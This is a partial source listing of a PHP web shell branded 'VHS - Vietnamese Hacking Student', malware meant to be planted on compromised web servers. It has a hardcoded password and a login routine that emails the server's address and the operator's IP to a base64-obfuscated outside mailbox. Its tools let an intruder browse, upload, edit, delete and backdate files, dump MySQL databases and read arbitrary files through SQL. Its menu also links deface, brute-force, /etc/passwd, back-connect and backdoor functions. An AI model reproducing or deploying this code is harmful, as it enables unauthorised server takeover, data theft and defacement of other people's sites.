shell

1. <?php
2. error_reporting(7);
3. @set_magic_quotes_runtime(0);
4. ob_start();
5. $mtime = explode(' ', microtime());
6. $starttime = $mtime[1] + $mtime[0];
7. define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
8. //define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
9. define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
10. define('IS_COM', class_exists('COM') ? 1 : 0 );
11. define('IS_GPC', get_magic_quotes_gpc());
12. $dis_func = get_cfg_var('disable_functions');
13. define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
14. @set_time_limit(0);
15.  
16. foreach(array('_GET','_POST') as $_request) {
17. foreach($$_request as $_key => $_value) {
18. if ($_key{0} != '_') {
19. if (IS_GPC) {
20. $_value = s_array($_value);
21. }
22. $$_key = $_value;
23. }
24. }
25. }
26.  
27. /*================= Info Login ================*/
28. $admin = array();
29. $admin['check'] = true;
30. $admin['pass'] = 'vhsteamsys'; // Password login
31. $admin['cookiepre'] = '';
32. $admin['cookiedomain'] = '';
33. $admin['cookiepath'] = '/';
34. $admin['cookielife'] = 86400;
35. /*===================== End =====================*/
36.  
37. if ($charset == 'utf8') {
38. header("content-Type: text/html; charset=utf-8");
39. } elseif ($charset == 'big5') {
40. header("content-Type: text/html; charset=big5");
41. } elseif ($charset == 'gbk') {
42. header("content-Type: text/html; charset=gbk");
43. } elseif ($charset == 'latin1') {
44. header("content-Type: text/html; charset=iso-8859-2");
45. }
46.  
47. $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
48. $timestamp = time();
49.  
50. /*===================== Login =====================*/
51. if ($action == "logout") {
52. scookie('vbapass', '', -86400 * 365);
53. p('<meta http-equiv="refresh" content="0;URL='.$self.'">');
54. p('<body background=black>');
55. exit;
56. }
57. if($admin['check']) {
58. if ($doing == 'login') {
59. if ($admin['pass'] == $password) {
60. scookie('vbapass', $password);
61.  
62. // Function mail Sender to my Email - Please remove this before you using this shell code, Thanks - Fernando - VBATeam
63. $time_shell = "".date("d/m/Y - H:i:s")."";
64. $ip_remote = $_SERVER["REMOTE_ADDR"];
65. $from_shellcode = 'shell@'.gethostbyname($_SERVER['SERVER_NAME']).'';
66. $to_email = base64_decode('em9yb3Zoc3ZuQGdtYWlsLmNvbQ==');
67. $server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])." - ".$_SERVER['HTTP_HOST']."";
68. $linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell";
69. $header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
70. @mail($to_email, $server_mail, $linkcr, $header);
71. p('<meta http-equiv="refresh" content="2;URL='.$self.'">');
72. p('<body bgcolor=black>
73. <BR><BR><div align=center><font color=yellow face=tahoma size=2>VHS - Vietnamese Hacking Student - Xin ch&#7901;...<BR><img src=http://edm-verticalmusic.com/loading45.gif></div>');
74. exit;
75. }
76.  
77. else
78. {
79. $err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>M&#7853;t kh&#7849;u kh&#244;ng &#273;&#250;ng, Xin vui l&#242;ng nh&#7853;p l&#7841;i!!!</blink><BR></font></div></td></tr></table>';
80. echo $err_mess;
81. }}
82. if ($_COOKIE['vbapass']) {
83. if ($_COOKIE['vbapass'] != $admin['pass']) {
84. loginpage();
85. }
86. } else {
87. loginpage();
88. }
89. }
90. /*===================== Login =====================*/
91.  
92. $errmsg = '';
93.  
94. if ($action == 'phpinfo') {
95. if (IS_PHPINFO) {
96. phpinfo();
97. } else {
98. $errmsg = 'phpinfo() function has non-permissible';
99. }
100. }
101.  
102.  
103. if ($doing == 'downfile' && $thefile) {
104. if (!@file_exists($thefile)) {
105. $errmsg = 'C&#225;c t&#7853;p tin b&#7841;n mu&#7889;n t&#7843;i xu&#7889;ng kh&#244;ng h&#7873; t&#7891;n t&#7841;i';
106. } else {
107. $fileinfo = pathinfo($thefile);
108. header('Content-type: application/x-'.$fileinfo['extension']);
109. header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
110. header('Content-Length: '.filesize($thefile));
111. @readfile($thefile);
112. exit;
113. }
114. }
115.  
116.  
117. if ($doing == 'backupmysql' && !$saveasfile) {
118. dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
119. $table = array_flip($table);
120. $result = q("SHOW tables");
121. if (!$result) p('<h2>'.mysql_error().'</h2>');
122. $filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
123. header('Content-type: application/unknown');
124. header('Content-Disposition: attachment; filename='.$filename);
125. $mysqldata = '';
126. while ($currow = mysql_fetch_array($result)) {
127. if (isset($table[$currow[0]])) {
128. $mysqldata .= sqldumptable($currow[0]);
129. }
130. }
131. mysql_close();
132. exit;
133. }
134.  
135. // Mysql
136. if($doing=='mysqldown'){
137. if (!$dbname) {
138. $errmsg = 'Please input dbname';
139. } else {
140. dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
141. if (!file_exists($mysqldlfile)) {
142. $errmsg = 'C&#225;c t&#7853;p tin b&#7841;n mu&#7889;n t&#7843;i xu&#7889;ng kh&#244;ng h&#7873; t&#7891;n t&#7841;i';
143. } else {
144. $result = q("select load_file('$mysqldlfile');");
145. if(!$result){
146. q("DROP TABLE IF EXISTS tmp_angel;");
147. q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
148. //Download SQL
149. q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
150. $result = q("select content from tmp_angel");
151. q("DROP TABLE tmp_angel");
152. }
153. $row = @mysql_fetch_array($result);
154. if (!$row) {
155. $errmsg = 'Load file failed '.mysql_error();
156. } else {
157. $fileinfo = pathinfo($mysqldlfile);
158. header('Content-type: application/x-'.$fileinfo['extension']);
159. header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
160. header("Accept-Length: ".strlen($row[0]));
161. echo $row[0];
162. exit;
163. }
164. }
165. }
166. }
167.  
168. ?>
169. <html>
170. <head>
171. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
172. <title><?php echo str_replace('.','','VHS - Vietnamese Hacking Student');?></title>
173. <style type="text/css">
174. body,td{font: 10pt Tahoma;color:#808f97;line-height: 16px;}
175.  
176. a {color: #4ca202;text-decoration:none;}
177. a:hover{color: #f00;text-decoration:underline;}
178. .alt1 td{border-top:1px solid yellow;border-bottom:1px solid yellow;background:black;padding:5px 10px 5px 5px;}
179. .alt2 td{border-top:1px solid yellow;border-bottom:1px solid yellow;background:black;padding:5px 10px 5px 5px;}
180. .focus td{border-top:1px solid yellow;border-bottom:0px solid yellow;background:black;padding:5px 10px 5px 5px;}
181. .fout1 td{border-top:1px solid yellow;border-bottom:0px solid yellow;background:black;padding:5px 10px 5px 5px;}
182. .fout td{border-top:1px solid yellow;border-bottom:0px solid yellow;background:black;padding:5px 10px 5px 5px;}
183. .head td{border-top:1px solid yellow;border-bottom:1px solid yellow;background:black;padding:5px 10px 5px 5px;font-weight:bold;}
184. .head_small td{border-top:1px solid yellow;border-bottom:1px solid yellow;background:black;padding:5px 10px 5px 5px;font-weight:normal;font-size:8pt;}
185. .head td span{font-weight:normal;}
186. form{margin:0;padding:0;}
187. h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#808f97;}
188. ul.info li{margin:0;color:green;line-height:24px;height:24px;}
189. u{text-decoration: none;color:green;float:left;display:block;width:150px;margin-right:10px;}
190. input, textarea, button
191. {
192. font-size: 9pt;
193. color: #ccc;
194. font-family: verdana, sans-serif;
195. background-color: #202020;
196. border-left: 1px solid #74A202;
197. border-top: 1px solid #74A202;
198. border-right: 1px solid #74A202;
199. border-bottom: 1px solid #74A202;
200. }
201. select
202. {
203. font-size: 8pt;
204. font-weight: normal;
205. color: #ccc;
206. font-family: verdana, sans-serif;
207. background-color: #202020;
208. }
209. </style>
210. <script type="text/javascript">
211. function CheckAll(form) {
212. for(var i=0;i<form.elements.length;i++) {
213. var e = form.elements[i];
214. if (e.name != 'chkall')
215. e.checked = form.chkall.checked;
216. }
217. }
218. function $(id) {
219. return document.getElementById(id);
220. }
221. function goaction(act){
222. $('goaction').action.value=act;
223. $('goaction').submit();
224. }
225. </script>
226. </head>
227. <body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black background=http://i1124.photobucket.com/albums/l575/givay/th_matrix.gif>
228.  
229.  
230. <div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">
231. <table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">
232. <tr>
233. <td align="center" valign=center>
234. <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600" align="center">
235. Loading<img src="http://edm-verticalmusic.com/loading8.gif">
236. </div>
237. </td>
238. </tr>
239. </table>
240. </div>
241. <script>
242. var ld=(document.all);
243. var ns4=document.layers;
244. var ns6=document.getElementById&&!document.all;
245. var ie4=document.all;
246. if (ns4)
247. ld=document.loading;
248. else if (ns6)
249. ld=document.getElementById("loading").style;
250. else if (ie4)
251. ld=document.all.loading.style;
252. function init()
253. {
254. if(ns4){ld.visibility="hidden";}
255. else if (ns6||ie4) ld.display="none";
256. }
257. </script>
258.  
259.  
260.  
261.  
262. <table width="100%" border="0" cellpadding="0" cellspacing="0">
263. <tr class="head_small">
264. <td width=100%>
265. <table width=100%><tr class="head_small"><td width=86px><a title="VHS - Vietnamese Hacking Student" href="<?php $self;?>"><img src=https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-xfp1/v/t1.0-9/13683_920690114621983_4380269181246432750_n.jpg?oh=717b32aec0921f65dd5eef8361311525&oe=55E7C15A&__gda__=1446249049_2321c698192c9f2891908f15bba8a7f7 height=86 border=0></a></td><td>
266. <span style="float:left;"> <?php echo "Hostname: ".$_SERVER['HTTP_HOST']."";?> | <a href="http://vhsteamsys.com" target="_blank"><?php echo str_replace('.','','VHS - Vietnamese Hacking Student');?> </a> | <a href="javascript:goaction('logout');"><font color=red>Logout</font></a></span> <br />
267.  
268. <?php
269. $curl_on = @function_exists('curl_version');
270. $mysql_on = @function_exists('mysql_connect');
271. $mssql_on = @function_exists('mssql_connect');
272. $pg_on = @function_exists('pg_connect');
273. $ora_on = @function_exists('ocilogon');
274.  
275. echo (($safe_mode)?("Safe_mod: <b><font color=green>B&#7853;t</font></b> - "):("Safe_mod: <b><font color=red>T&#7855;t</font></b> - "));
276. echo "Phi&#234;n b&#7843;n PHP: <b>".@phpversion()."</b> - ";
277. echo "cURL: ".(($curl_on)?("<b><font color=green>B&#7853;t</font></b> - "):("<b><font color=red>T&#7855;t</font></b> - "));
278. echo "MySQL: <b>";
279. $mysql_on = @function_exists('mysql_connect');
280. if($mysql_on){
281. echo "<font color=green>B&#7853;t</font></b> - "; } else { echo "<font color=red>T&#7855;t</font></b> - "; }
282. echo "MSSQL: <b>";
283. $mssql_on = @function_exists('mssql_connect');
284. if($mssql_on){echo "<font color=green>B&#7853;t</font></b> - ";}else{echo "<font color=red>T&#7855;t</font></b> - ";}
285. echo "PostgreSQL: <b>";
286. $pg_on = @function_exists('pg_connect');
287. if($pg_on){echo "<font color=green>B&#7853;t</font></b> - ";}else{echo "<font color=red>T&#7855;t</font></b> - ";}
288. echo "Oracle: <b>";
289. $ora_on = @function_exists('ocilogon');
290. if($ora_on){echo "<font color=green>B&#7853;t</font></b>";}else{echo "<font color=red>T&#7855;t</font></b><BR>";}
291.  
292. echo "Disable functions : <b>";
293. if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>Kh&#244;ng c&#243;</font></b><BR>";}else{echo "<font color=red>$df</font></b><BR>";}
294.  
295. echo "<font color=white>Uname -a</font>: ".@substr(@php_uname(),0,120)."<br>";
296. echo "<font color=white>Server</font>: ".@substr($SERVER_SOFTWARE,0,120)." - <font color=white>id</font>: ".@getmyuid()."(".@get_current_user().") - uid=".@getmyuid()." (".@get_current_user().") gid=".@getmygid()."(".@get_current_user().")<br>";
297. ?>
298. </td></tr></table></td>
299. </tr>
300. <tr class="alt1">
301. <td width=10%><span style="float:left;">[Server IP: <?php echo "<font color=yellow>".gethostbyname($_SERVER['SERVER_NAME'])."</font>";?> - IP c&#7911;a b&#7841;n: <?php echo "<font color=yellow>".$_SERVER['REMOTE_ADDR']."</font>";?>] </span> <br />
302. --------------------------------------------------------------------------------------<br />
303.  
304. <a href="javascript:goaction('file');">Qu&#7843;n l&#253; t&#7853;p tin</a> |
305. <a href="javascript:goaction('sqladmin');">Qu&#7843;n l&#253; MySQL</a> |
306. <a href="javascript:goaction('sqlfile');">MySQL Upload &amp; Download</a> |
307. <a href="javascript:goaction('shell');">L&#7879;nh</a> |
308. <a href="javascript:goaction('encode');">M&#227; h&#243;a</a> |
309. <a href="javascript:goaction('deface');">Deface</a> |
310. <a href="javascript:goaction('extract');">Extract Shell</a>
311. <?php if (!IS_WIN) {?> | <a href="javascript:goaction('brute');">Brute</a> <?php }?>
312. <?php if (!IS_WIN) {?> | <a href="javascript:goaction('etcpwd');">/etc/passwd</a> <?php }?>
313. <?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?> |
314. <a href="javascript:goaction('backdoor');">&#272;&#7863;t Backdoor</a> |
315. </td>
316. </tr>
317. </table>
318. <table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
319. <?php
320.  
321. formhead(array('name'=>'goaction'));
322. makehide('action');
323. formfoot();
324.  
325. $errmsg && m($errmsg);
326.  
327. // Dir function
328. !$dir && $dir = '.';
329. $nowpath = getPath(SA_ROOT, $dir);
330. if (substr($dir, -1) != '/') {
331. $dir = $dir.'/';
332. }
333. $uedir = ue($dir);
334.  
335. if (!$action || $action == 'file') {
336.  
337. // Non-writeable
338. $dir_writeable = @is_writable($nowpath) ? 'C&#243; th&#7875; ghi' : 'Kh&#244;ng th&#7875; ghi';
339.  
340. // Delete dir
341. if ($doing == 'deldir' && $thefile) {
342. if (!file_exists($thefile)) {
343. m($thefile.' Th&#432; m&#7909;c kh&#244;ng t&#7891;n t&#7841;i');
344. } else {
345. m('X&#243;a th&#432; m&#7909;c '.(deltree($thefile) ? basename($thefile).'Th&#224;nh C&#244;ng' : 'Th&#7845;t B&#7841;i'));
346. }
347. }
348.  
349. // Create new dir
350. elseif ($newdirname) {
351. $mkdirs = $nowpath.$newdirname;
352. if (file_exists($mkdirs)) {
353. m('Th&#432; m&#7909;c &#273;&#227; t&#7891;n t&#7841;i');
354. } else {
355. m('T&#7841;o th&#432; m&#7909;c '.(@mkdir($mkdirs,0777) ? 'Th&#224;nh C&#244;ng' : 'Th&#7845;t B&#7841;i'));
356. @chmod($mkdirs,0777);
357. }
358. }
359.  
360. // Upload file
361. elseif ($doupfile) {
362. m('Upload t&#7853;p tin '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'Th&#224;nh C&#244;ng' : 'Th&#7845;t B&#7841;i'));
363. }
364.  
365. // Edit file
366. elseif ($editfilename && $filecontent) {
367. $fp = @fopen($editfilename,'w');
368. m('Save file '.(@fwrite($fp,$filecontent) ? 'Th&#224;nh C&#244;ng' : 'Th&#7845;t B&#7841;i'));
369. @fclose($fp);
370. }
371.  
372. // Modify
373. elseif ($pfile && $newperm) {
374. if (!file_exists($pfile)) {
375. m('C&#225;c t&#7853;p tin g&#7889;c kh&#244;ng t&#7891;n t&#7841;i');
376. } else {
377. $newperm = base_convert($newperm,8,10);
378. m('Thay &#273;&#7893;i thu&#7897;c t&#237;nh '.(@chmod($pfile,$newperm) ? 'Th&#224;nh C&#244;ng' : 'Th&#7845;t B&#7841;i'));
379. }
380. }
381.  
382. // Rename
383. elseif ($oldname && $newfilename) {
384. $nname = $nowpath.$newfilename;
385. if (file_exists($nname) || !file_exists($oldname)) {
386. m($nname.' &#272;&#227; t&#7891;n t&#7841;i ho&#7863;c th&#432; m&#7909;c g&#7889;c kh&#244;ng t&#7891;n t&#7841;i');
387. } else {
388. m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' Th&#224;nh C&#244;ng' : 'Th&#7845;t B&#7841;i'));
389. }
390. }
391.  
392. // Copu
393. elseif ($sname && $tofile) {
394. if (file_exists($tofile) || !file_exists($sname)) {
395. m('C&#225;c t&#7879;p tin &#273;&#227; t&#7891;n t&#7841;i ho&#7863;c t&#7853;p tin g&#7889;c kh&#244;ng t&#7891;n t&#7841;i');
396. } else {
397. m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' Th&#224;nh C&#244;ng' : 'Th&#7845;t B&#7841;i'));
398. }
399. }
400.  
401. // File exit
402. elseif ($curfile && $tarfile) {
403. if (!@file_exists($curfile) || !@file_exists($tarfile)) {
404. m('C&#225;c t&#7879;p tin &#273;&#227; t&#7891;n t&#7841;i ho&#7863;c t&#7853;p tin g&#7889;c kh&#244;ng t&#7891;n t&#7841;i');
405. } else {
406. $time = @filemtime($tarfile);
407. m('S&#7917;a t&#7853;p tin s&#7917;a &#273;&#7893;i cu&#7889;i c&#249;ng '.(@touch($curfile,$time,$time) ? 'Th&#224;nh C&#244;ng' : 'Th&#7845;t B&#7841;i'));
408. }
409. }
410.  
411. // Date
412. elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
413. if (!@file_exists($curfile)) {
414. m(basename($curfile).' does not exist');
415. } else {
416. $time = strtotime("$year-$month-$day $hour:$minute:$second");
417. m('S&#7917;a t&#7853;p tin s&#7917;a &#273;&#7893;i cu&#7889;i c&#249;ng '.(@touch($curfile,$time,$time) ? 'Th&#224;nh C&#244;ng' : 'Th&#7845;t B&#7841;i'));
418. }
419. }
420.  
421. // Download
422. elseif($doing == 'downrar') {
423. if ($dl) {
424. $dfiles='';
425. foreach ($dl as $filepath => $value) {
426. $dfiles.=$filepath.',';
427. }
428. $dfiles=substr($dfiles,0,strlen($dfiles)-1);
429. $dl=explode(',',$dfiles);
430. $zip=new PHPZip($dl);
431. $code=$zip->out;
432. header('Content-type: application/octet-stream');
433. header('Accept-Ranges: bytes');
434. header('Accept-Length: '.strlen($code));
435. header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
436. echo $code;
437. exit;
438. } else {
439. m('Please select file(s)');
440. }
441. }
442.  
443. // Delete file
444. elseif($doing == 'delfiles') {
445. if ($dl) {
446. $dfiles='';
447. $succ = $fail = 0;
448. foreach ($dl as $filepath => $value) {
449. if (@unlink($filepath)) {
450. $succ++;
451. } else {
452. $fail++;
453. }
454. }
455. m('Deleted file have finished??choose '.count($dl).' success '.$succ.' fail '.$fail);
456. } else {
457. m('Please select file(s)');
458. }
459. }
460.  
461. // Function Newdir
462. formhead(array('name'=>'createdir'));
463. makehide('newdirname');
464. makehide('dir',$nowpath);
465. formfoot();
466. formhead(array('name'=>'fileperm'));
467. makehide('newperm');
468. makehide('pfile');
469. makehide('dir',$nowpath);
470. formfoot();
471. formhead(array('name'=>'copyfile'));
472. makehide('sname');
473. makehide('tofile');
474. makehide('dir',$nowpath);
475. formfoot();
476. formhead(array('name'=>'rename'));
477. makehide('oldname');
478. makehide('newfilename');
479. makehide('dir',$nowpath);
480. formfoot();
481. formhead(array('name'=>'fileopform'));
482. makehide('action');
483. makehide('opfile');
484. makehide('dir');
485. formfoot();
486.  
487. $free = @disk_free_space($nowpath);
488. !$free && $free = 0;
489. $all = @disk_total_space($nowpath);
490. !$all && $all = 0;
491. $used = $all-$free;
492. $used_percent = @round(100/($all/$free),2);
493. p('<font color=yellow face=tahoma size=2><B>Qu&#7843;n l&#253; t&#7853;p tin</b> </font> Dung l&#432;&#7907;ng tr&#7889;ng <font color=red>'.sizecount($free).'</font> c&#7911;a <font color=red>'.sizecount($all).'</font> (<font color=red>'.$used_percent.'</font>%)</font>');
494.  
495. ?>
496. <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
497. <form action="" method="post" id="godir" name="godir">
498. <tr>
499. <td nowrap>Th&#432; m&#7909;c hi&#7879;n t&#7841;i (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
500. <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
501. <td nowrap><input class="bt" value="&#272;&#7871;n" type="submit"></td>
502. </tr>
503. </form>
504. </table>
505. <script type="text/javascript">
506. function createdir(){
507. var newdirname;
508. newdirname = prompt('Vui lòng nhập tên thư mục:', '');
509. if (!newdirname) return;
510. $('createdir').newdirname.value=newdirname;
511. $('createdir').submit();
512. }
513. function fileperm(pfile){
514. var newperm;
515. newperm = prompt('Current file:'+pfile+'\nVui lòng nhập thuộc tính mới:', '');
516. if (!newperm) return;
517. $('fileperm').newperm.value=newperm;
518. $('fileperm').pfile.value=pfile;
519. $('fileperm').submit();
520. }
521. function copyfile(sname){
522. var tofile;
523. tofile = prompt('Original file:'+sname+'\nXin nhập tập tin đối tượng (đường dẫn):', '');
524. if (!tofile) return;
525. $('copyfile').tofile.value=tofile;
526. $('copyfile').sname.value=sname;
527. $('copyfile').submit();
528. }
529. function rename(oldname){
530. var newfilename;
531. newfilename = prompt('Former file name:'+oldname+'\nXin nhập tên mới cho tập tin:', '');
532. if (!newfilename) return;
533. $('rename').newfilename.value=newfilename;
534. $('rename').oldname.value=oldname;
535. $('rename').submit();
536. }
537. function dofile(doing,thefile,m){
538. if (m && !confirm(m)) {
539. return;
540. }
541. $('filelist').doing.value=doing;
542. if (thefile){
543. $('filelist').thefile.value=thefile;
544. }
545. $('filelist').submit();
546. }
547. function createfile(nowpath){
548. var filename;
549. filename = prompt('Hãy nhập tên cho tập tin:', '');
550. if (!filename) return;
551. opfile('editfile',nowpath + filename,nowpath);
552. }
553. function opfile(action,opfile,dir){
554. $('fileopform').action.value=action;
555. $('fileopform').opfile.value=opfile;
556. $('fileopform').dir.value=dir;
557. $('fileopform').submit();
558. }
559. function godir(dir,view_writable){
560. if (view_writable) {
561. $('godir').view_writable.value=1;
562. }
563. $('godir').dir.value=dir;
564. $('godir').submit();
565. }
566. </script>
567. <?php
568. tbhead();
569. p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
570. p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');
571. p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
572. if ($view_writable) {
573. p(' | <a href="javascript:godir(\''.$nowpath.'\');">Xem t&#7845;t c&#7843;</a>');
574. } else {
575. p(' | <a href="javascript:godir(\''.$nowpath.'\',\'1\');">Xem Writable</a>');
576. }
577. p(' | <a href="javascript:createdir();">T&#7841;o th&#432; m&#7909;c</a> | <a href="javascript:createfile(\''.$nowpath.'\');">T&#7841;o file</a>');
578. if (IS_WIN && IS_COM) {
579. $obj = new COM('scripting.filesystemobject');
580. if ($obj && is_object($obj)) {
581. $DriveTypeDB = array(0 => 'Unknown',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
582. foreach($obj->Drives as $drive) {
583. if ($drive->DriveType == 2) {
584. p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).'&#13;Free:'.sizecount($drive->FreeSpace).'&#13;Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
585. } else {
586. p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
587. }
588. }
589. }
590. }
591.  
592. p('</td></tr></form>');
593.  
594. p('<tr class="head"><td>&nbsp;</td><td>T&#234;n file</td><td width="16%">L&#7847;n s&#7917;a cu&#7889;i</td><td width="10%">K&#237;ch th&#432;&#7899;c</td><td width="20%">Chmod / Perms</td><td width="22%">H&#224;nh &#273;&#7897;ng</td></tr>');
595.  
596. // Get path
597. $dirdata=array();
598. $filedata=array();
599.  
600. if ($view_writable) {
601. $dirdata = GetList($nowpath);
602. } else {
603. // Open dir
604. $dirs=@opendir($dir);
605. while ($file=@readdir($dirs)) {
606. $filepath=$nowpath.$file;
607. if(@is_dir($filepath)){
608. $dirdb['filename']=$file;
609. $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
610. $dirdb['dirchmod']=getChmod($filepath);
611. $dirdb['dirperm']=getPerms($filepath);
612. $dirdb['fileowner']=getUser($filepath);
613. $dirdb['dirlink']=$nowpath;
614. $dirdb['server_link']=$filepath;
615. $dirdb['client_link']=ue($filepath);
616. $dirdata[]=$dirdb;
617. } else {
618. $filedb['filename']=$file;
619. $filedb['size']=sizecount(@filesize($filepath));
620. $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
621. $filedb['filechmod']=getChmod($filepath);
622. $filedb['fileperm']=getPerms($filepath);
623. $filedb['fileowner']=getUser($filepath);
624. $filedb['dirlink']=$nowpath;
625. $filedb['server_link']=$filepath;
626. $filedb['client_link']=ue($filepath);
627. $filedata[]=$filedb;
628. }
629. }// while
630. unset($dirdb);
631. unset($filedb);
632. @closedir($dirs);
633. }
634. @sort($dirdata);
635. @sort($filedata);
636. $dir_i = '0';
637. foreach($dirdata as $key => $dirdb){
638. if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
639. $thisbg = bg();
640. p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
641. p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
642. p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
643. p('<td nowrap>'.$dirdb['mtime'].'</td>');
644. p('<td nowrap>--</td>');
645. p('<td nowrap>');
646. p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
647. p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
648. p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete '.$dirdb['filename'].'? \\n\\nN&#7871;u th&#432; m&#7909;c kh&#244;ng r&#7895;ng, s&#7869; x&#243;a t&#7845;t c&#7843; c&#225;c file.\')">X&#243;a</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">&#272;&#7893;i t&#234;n</a></td>');
649. p('</tr>');
650. $dir_i++;
651. } else {
652. if($dirdb['filename']=='..') {
653. p('<tr class=fout>');
654. p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Th&#432; m&#7909;c ch&#237;nh</a></td>');
655. p('</tr>');
656. }
657. }
658. }
659.  
660. p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');
661. p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
662. makehide('action','file');
663. makehide('thefile');
664. makehide('doing');
665. makehide('dir',$nowpath);
666. $file_i = '0';
667. foreach($filedata as $key => $filedb){
668. if($filedb['filename']!='..' && $filedb['filename']!='.') {
669. $fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);
670. $thisbg = bg();
671. p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
672. p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
673. p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
674. p('<td nowrap>'.$filedb['mtime'].'</td>');
675. p('<td nowrap>'.$filedb['size'].'</td>');
676. p('<td nowrap>');
677. p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
678. p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
679. p('<td nowrap>');
680. p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">T&#7843;i xu&#7889;ng</a> | ');
681. p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
682. p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">S&#7917;a</a> | ');
683. p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">&#272;&#7893;i t&#234;n</a> | ');
684. p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Th&#7901;i gian</a>');
685. p('</td></tr>');
686. $file_i++;
687. }
688. }
